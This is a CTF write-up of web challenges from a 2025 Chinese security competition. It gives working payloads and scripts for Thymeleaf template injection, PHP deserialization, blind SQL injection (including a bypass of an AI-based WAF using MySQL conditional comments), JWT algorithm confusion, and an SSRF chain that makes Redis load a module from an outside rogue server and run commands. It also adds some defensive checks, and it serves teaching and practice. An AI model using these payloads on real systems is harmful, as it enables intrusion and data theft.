19th National College Student Information Security Competition (Innovation and Practice Contest) and 3rd "Great Wall Cup" Cyber, Data and Intelligence Security Competition (Defense Contest), Preliminary Round
2025-12-28

## [Web] EzJava

Weak credentials: admin/admin123 log you in.

Thymeleaf SSTI payloads (Spring framework). Test expression:

```
[[${7*7}]]
```

Output:

```
49
```

Dump the evaluation context:

```
[[${#ctx}]]
```

Output:

```
{ip=10.0.0.248, now=2025-12-28T09:58:19.162353, ua=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36, thymeleaf::EvaluationContext=org.thymeleaf.spring5.expression.ThymeleafEvaluationContextWrapper@765801c6}[StandardHTMLInliner]([[${#ctx}]])
```

Read the flag file through reflection on the context object:

```
[[${#ctx.getClass().forName("java.nio.file.Files").getMethod("readString", #ctx.getClass().forName("java.nio.file.Path")).invoke(null, #ctx.getClass().forName("java.nio.file.Paths").getMethod("get", #ctx.getClass().forName("java.lang.String"), #ctx.getClass().forName("[Ljava.lang.String;")).invoke(null, "/fl" + "ag_y0u_d0nt_kn0w", #strings.arraySplit("", ",")))}]]
```

## [Web] dedecms

Register an account first. A user named Aa123456789 already exists; trying to log in as it reveals the weak password Aa123456789/Aa123456789.

A quick search shows that dedecms v5.1 sp2 has a large number of known vulnerabilities, most of them file uploads where you intercept the request and change the extension. Pick any upload point, upload an image with PHP code embedded, intercept the request and change the extension to php.

## [Web] redjs

The React.js vulnerability disclosed a few days earlier; React2Shell solves it in one shot.

## [Web] hellogate

Visiting the target shows an image. Downloading it reveals that it is an image with PHP source embedded:

```php
<?php
error_reporting(0);
class A {
    public $handle;
    public function triggerMethod() {
        echo "" . $this->handle;
    }
}
class B {
    public $worker;
    public $cmd;
    public function __toString() {
        return $this->worker->result;
    }
}
class C {
    public $cmd;
    public function __get($name) {
        echo file_get_contents($this->cmd);
    }
}
$raw = isset($_POST['data']) ? $_POST['data'] : '';
header('Content-Type: image/jpeg');
readfile("muzujijiji.jpg");
highlight_file(__FILE__);
$obj = unserialize($_POST['data']);
$obj->triggerMethod();
```

It is a POP chain (A::triggerMethod echoes $handle, B::__toString reads $worker->result, C::__get reads the file named in $cmd). Exploit:

```php
<?php
class A {
    public $handle;
}
class B {
    public $worker;
}
class C {
    public $cmd;
}
$a = new A();
$b = new B();
$c = new C();
$c->cmd = '/flag';
$b->worker = $c;
$a->handle = $b;
echo urlencode(serialize($a));
?>
```

POST the output as the data parameter to get the flag.

## [Web] AI_WAF

SQL injection behind an AI reviewer. After a little probing, -1'||substr(database(),1,1)='a'# turned out to work for boolean-based blind injection. Exploit:

```python
from time import sleep
import requests
import string

url = "http://60.205.252.190:34938/search"
headers = {"Content-Type": "application/json"}
# chars = string.digits + string.ascii_letters + "_"
chars = string.ascii_letters + "_"
result = ""
for i in range(1, 20):
    for char in chars:
        # Payload: -1'||substr(database(),1,1)='a'#
        payload = f"-1'||substr(database(),{i},1)='{char}'#"
        data = {"query": payload}
        try:
            sleep(1)
            r = requests.post(url, json=data, headers=headers, timeout=3)
            res = r.json()
            print(res)
            # a non-zero result count means the guessed character is right
            count = res.get("count", 0)
            if count != 0:
                result += char
                print(result)
                break
        except Exception as e:
            print("request failed:", e)
print(result)
# nexadata
```

With the database name in hand I went on to blind-inject the table names, but found that this no longer got past the AI WAF, so I looked for another approach. Replacing database() with version() and blind-injecting showed the server is MySQL 5.

/*!50000 */ is a MySQL-specific version-conditional inline comment: its contents are executed as SQL only when the server version is at least the given number (50000 here means 5.0.0). Because this syntax is uncommon, it can be used to get past the AI WAF.

Construct the following payload:

```
-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ group_concat(table_name) /*!50000from*/ /*!50000information_schema.tables*/ /*!50000where*/ table_schema='nexadata'),3;#
```

1. This returns the table names article,where_is_my_flagggggg.

```
-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ * from nexadata.where_is_my_flagggggg),3;#
```

2. This returns the flag.
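As an added defensive illustration (my code, not part of the original writeup), the normaliser below shows why a keyword filter has to rewrite MySQL version-conditional comments the way the server will read them: on the raw payload above a word-boundary match for union/select finds nothing, because the tokens read as 50000union and 50000select, while the normalised form matches immediately. The payload string is the one quoted above; the regexes and function names are mine.

```python
import re

# MySQL executes the body of /*!NNNNN body */ when its version is >= NNNNN, so the
# server runs "union select" while a tokenizer sees "50000union". A filter must
# normalise the statement the way the server will read it before matching.
COND_COMMENT = re.compile(r"/\*!\d{0,6}\s*(.*?)\s*\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)          # ordinary comments are dropped
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)

# The payload quoted above, used as sample input.
PAYLOAD = ("-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ group_concat(table_name) "
           "/*!50000from*/ /*!50000information_schema.tables*/ /*!50000where*/ "
           "table_schema='nexadata'),3;#")


def normalize_mysql(sql: str) -> str:
    """Rewrite conditional comments to their bodies, drop other block comments,
    and collapse whitespace so keyword sequences become visible."""
    sql = COND_COMMENT.sub(r" \1 ", sql)
    sql = PLAIN_COMMENT.sub(" ", sql)
    return " ".join(sql.split())


def flags_union_select(sql: str, normalize: bool = True) -> bool:
    """Word-boundary UNION ... SELECT check, on the raw or the normalised text."""
    text = normalize_mysql(sql) if normalize else sql
    return UNION_SELECT.search(text) is not None
```

The same idea applies to the -- and # line-comment forms and to whitespace substitutes, which a production rule set would fold in as well.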

## [Web] Deprecated

Per AsaL1n's writeup this is a re-used challenge: the RSA public key is recovered from two RS256 signatures with a GCD, then reused as an HMAC secret.

```
git clone https://github.com/sammwyy/r2sae
cd r2sae
docker run -it sig2n /bin/bash
root@7f5f15b8bf09:/app# python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjI0fQ.200-7l5FAFAPmXWjvcpPbmxUPHdowPrwdswwuWQAo68D882fCdlAiG54vWx2l3I-iM2mXOVDFxlVnw5A4gzxqxwhtu5RIITQwApDBxGu_3MHdQ10_nvvO8tDv7fFSrC2_kM4VOVEtjabQBgn1OGQfNjAQEeM8m1nxX5qXsyBUEI eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjY0fQ.nnk29Tek8TIcRFEjHmDnC60_cSToSAXPbbD-v3jZJu_bbwG7tBPCHohbz3fvZt4yUmH5vXLDyawJDyaKzfiQFI7LNhr12TInDmiDJRIBNAjKBSDAiXZS37I_lss8ftrJq8olOhkzlCRia5EQUqpp_s08jQe75FKifXM_zuugLE4 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjgwfQ.aPy4NdsNwghpXlB0PoLohDaM4kgDilHmsnkPl691_dNvwuPyXmpJ4Qzd68wH0zq9oavXckgCim4AiM8p-jtNJA8jwBidR85DePOye73XISAHFb8xC24e0dfvK4pytbmAyfjys8fAPYigU4ATH6ZEY5zOEXSpkWZdM3XFFoR-7XY
[*] GCD: 0x1
[*] GCD: 0xe5f772ebb5363556eaa13c773bcb939090798e1107e90c6b3703c4779a72c3717377248f2d32876270eb767acfa88cfebaa70501bdd58b8b2f5229d1cf0068cd19902d4a9501b9935887fe4e91d8c82b2488f69163ece5fed2ebad57df358feaa93bb39e0ead8e4c77a8d5b7e52474d11e5d0ce58cb8e796e583a2928266e35b
[+] Found n with multiplier 1 :
0xe5f772ebb5363556eaa13c773bcb939090798e1107e90c6b3703c4779a72c3717377248f2d32876270eb767acfa88cfebaa70501bdd58b8b2f5229d1cf0068cd19902d4a9501b9935887fe4e91d8c82b2488f69163ece5fed2ebad57df358feaa93bb39e0ead8e4c77a8d5b7e52474d11e5d0ce58cb8e796e583a2928266e35b
[+] Written to e5f772ebb5363556_65537_x509.pem
[+] Tampered JWT: b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk'
[+] Written to e5f772ebb5363556_65537_pkcs1.pem
[+] Tampered JWT: b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.dpXSrmSVXe_4JyAGUm0QvHrWDe3JfKh7uxg6A1p8C18'
================================================================================
Here are your JWT's once again for your copypasting pleasure
================================================================================
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.dpXSrmSVXe_4JyAGUm0QvHrWDe3JfKh7uxg6A1p8C18
```

With the public key recovered, the rest follows the writeup step by step. Note that the tool's output tokens carry alg HS256 while the server's own tokens are RS256: the whole attack rests on a verifier that lets the token choose the algorithm.
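To make that verifier mistake concrete, here is an added example (my code, not the challenge's or the tool's) that parses the two tokens quoted in the session above, shows the header-selected-algorithm verification path that accepts an HS256 token keyed with the RSA public key PEM, and the server-side algorithm pin that rejects it before any signature check. The PEM bytes used in the test are a constructed placeholder, not the recovered key; function names are mine.

```python
import base64
import hashlib
import hmac
import json

# The two tokens quoted in the terminal session above: the server's original
# RS256 token and the HS256 rewrite the tool produced with the recovered key.
ORIGINAL = ("eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9."
            "eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjI0fQ."
            "200-7l5FAFAPmXWjvcpPbmxUPHdowPrwdswwuWQAo68D882fCdlAiG54vWx2l3I-iM2mXOVDFxlVnw5A"
            "4gzxqxwhtu5RIITQwApDBxGu_3MHdQ10_nvvO8tDv7fFSrC2_kM4VOVEtjabQBgn1OGQfNjAQEeM8m1n"
            "xX5qXsyBUEI")
TAMPERED = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
            "eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEy"
            "MjQsICJleHAiOiAxNzY2OTg5MzUzfQ."
            "wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk")

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def jwt_header(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[0]))

def jwt_claims(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))

def verify_trusting_header(token: str, key_material: bytes) -> bool:
    """Vulnerable pattern: the token's header picks the algorithm and the one key
    the server holds (its RSA public key PEM) feeds whichever branch runs, so an
    HS256 token keyed with that PEM is accepted. RS256 branch omitted (needs RSA)."""
    head, body, sig = token.split(".")
    if jwt_header(token).get("alg") != "HS256":
        return False
    expected = hmac.new(key_material, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))

def alg_pin_ok(token: str, expected_alg: str) -> bool:
    """Hardened gate, run before any signature check: the server fixes the
    algorithm, and a token naming any other one is rejected outright."""
    return jwt_header(token).get("alg") == expected_alg

def hs256_token(claims: dict, key: bytes) -> str:
    """Plain HS256 minting, used only to exercise the two verifiers in a test."""
    signing_input = b64url(b'{"alg":"HS256","typ":"JWT"}') + "." + b64url(json.dumps(claims).encode())
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)
```

In a real service the pin belongs in the library call itself (an explicit allowed-algorithms list), so the header is never consulted for the choice.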

## [Unsolved][Web] 0o0o0o0o0

```
http://123.56.93.38:28707/data?id=1'union select 1,2,3 and '1'='1
```

Columns 1 and 2 are controllable; no further progress.

## [Post-contest reproduction][Web] hjppx

SSRF. Simple probing found Redis, MySQL and a pb-cms on port 8080 on the internal network.

Fetching dict://127.0.0.1:6379/info showed that Redis has no password set. Using redis-rogue-server and following its README, send the following requests in order:

```
# set the dump filename
action=fetch&url=dict://127.0.0.1:6379/config:set:dbfilename:exp.so
# connect to the rogue Redis server as a replica
action=fetch&url=dict://127.0.0.1:6379/slaveof:120.26.146.96:21000
# load the module
action=fetch&url=dict://127.0.0.1:6379/module:load:./exp.so
# stop replication
action=fetch&url=dict://127.0.0.1:6379/slaveof:no:one
# run a system command
action=fetch&url=dict://127.0.0.1:6379/system.exec:"ls /"
```
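Every step above goes through one fetch action that proxies an arbitrary scheme to an arbitrary host. As an added example (my code, not the challenge's), this is the check such a fetch endpoint should apply before connecting: only http/https, no embedded credentials, and every address the host resolves to must be globally routable, so loopback and RFC 1918 targets like the Redis above are refused. The resolver parameter exists so the test can run offline; the 10.0.0.248 address in the test is the one the EzJava context dump showed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host: str) -> set[str]:
    """Every address the name resolves to; all of them must pass the check."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}


def fetch_url_allowed(url: str, resolver=resolve_all) -> tuple[bool, str]:
    """Returns (allowed, reason) for a user-supplied fetch target.

    Rejects the dict:// style URLs the fetch action above accepted (only http
    and https may be proxied), embedded credentials, and any host resolving to
    a loopback, private, link-local or otherwise non-global address, which is
    exactly what reaches the internal Redis, MySQL and pb-cms here."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    try:
        addrs = resolver(parts.hostname)
    except (OSError, ValueError):
        return False, "unresolvable host"
    for addr in addrs:
        if not ipaddress.ip_address(addr).is_global:
            return False, f"{parts.hostname} resolves to non-global address {addr}"
    return True, "ok"
```

The address that passed the check must also be the one actually connected to, and any redirect re-checked, otherwise a DNS answer that changes between check and fetch defeats the test.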


Source: https://blog.chaomixian.top/posts/2025-ccb-ciscn-quals/
Author: 炒米线
Published: 2025-12-28
License: CC BY-NC-SA 4.0